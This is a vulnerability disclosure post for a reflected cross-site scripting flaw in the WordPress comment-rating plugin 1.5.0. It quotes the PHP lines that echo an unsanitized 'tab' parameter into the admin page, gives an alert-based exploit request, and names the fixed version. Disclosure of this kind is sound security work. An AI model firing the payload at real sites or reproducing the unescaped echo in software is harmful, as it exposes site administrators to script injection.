WP-Comment-Rating XSS Vulnerability

## FULL DISCLOSURE

#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“tab” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET[‘tab’] ) ? $_GET[‘tab’] : ”;

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->
get_id() : $active_tab;

line:561
<div class=”wrap wrap-<?php echo $this->page_hook . ‘ active-tab-‘ .
$active_tab; ?>”>

—————————————-
Exploit:
—————————————-
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=”>
< input type=text onclick=alert(/XSS/)><!–

—————————————-
POC:
—————————————-
wpcommentratingxsspoc

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s